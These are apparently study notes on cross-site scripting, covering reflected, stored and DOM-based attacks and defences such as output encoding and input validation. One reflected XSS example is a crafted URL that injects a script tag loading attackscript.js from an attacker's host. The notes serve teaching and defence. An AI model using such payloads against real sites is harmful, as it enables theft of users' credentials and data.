Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a malicious script hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser’s security model of trusted zones.
- leverages the access a current user has to a website
- uses this access to
- carry out actions the user has the capability to perform
- and/or access the current user’s data
- uses this access to
- attacker will make a vulnerable website send malicious code to the victim’s browser
- performs any action the user is able to complete in the web app
- read protected data within the web app
- capture login credentials
- push malware to the web application
- performs any action the user is able to complete in the web app
Types of XSS
Reflected XSS
Reflected XSS is an attack where the malicious input comes from a crafted link.
- aka nonpersistent XSS
- the attack “bounces” off the web server when the link is clicked
- attack proceeds as follows:
- The attacker identifies an input validation vulnerability in the trusted site.
- The attacker crafts a URL to perform a code injection against the trusted site
- could be coded in:
- a link from the attacker’s site to the trusted site
- a link in an email message
- could be coded in:
- When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker
- browser is likely to be configured to allow the site to run scripts
- so the malicious code will execute
- malicious code runs in the client’s browser with the same permission level as the trusted site
- the malicious script is not stored on the server, but a link with malicious script is reflected off the server by executing in the victims browser when clicked
- defend with output encoding
Reflected XSS Example
attacker may send a well-crafted URL to the victim which will execute against the web server when clicked
https://www.foo.com/status?message=<script src=https://bar.com/attackscript.js></script>
- make the
foo.comwebserver push theattackscript.jsfile, hosted on the attacker’s websitebar.com, to the victim’s browser
- where it would be executed and perform whatever tasks it was designed to perform
Persistent XSS
Persistent XSS attack aims to insert code into a back-end database or content management system used by the trusted site.
- aka stored XSS
- occurs when malicious code is injected into a web application’s database
- is then executed by all future visitors who view the infected page
- malicious code is stored in the web application’s database and executed when a user accesses the affected page
- particularly dangerous because they can:
- steal sensitive user information
- login credentials, financial data
- be used to gain unauthorized access to a web application’s database
- steal sensitive user information
- prevent by implementing proper input validation and sanitization
Stored XSS Example
- attacker might leave a comment containing the attack script in the comments section of an entry on a blog
- People visiting the web page with their browsers would execute the attack
Client-side Scripts
client-side scripts attack exploits vulnerabilities in client-side scripts.
- e.g., Document Object Model (DOM)
- attackers send malicious scripts to a web app’s client-side implementation of JavaScript to execute their attack solely on the client
Info
DOM-based cross-site scripting (XSS) occurs when a web application’s client-side script manipulates the Document Object Model (DOM) of a webpage.
- Unlike other forms of XSS attacks that exploit server-side vulnerabilities,
- DOM-based XSS attacks target the client-side environment,
- allowing an attacker to inject malicious script code executed within the user’s browser within the context of the targeted webpage
Mitigation
- details and best practice defenses for XSS attacks:
- from OWASP at https://owasp.org/www-community/attacks/xss/
- primary defense is output encoding
- ensures user input displayed on a web page is treated as data rather than executable code
- prevents execution of malicious scripts
-
defend with input validation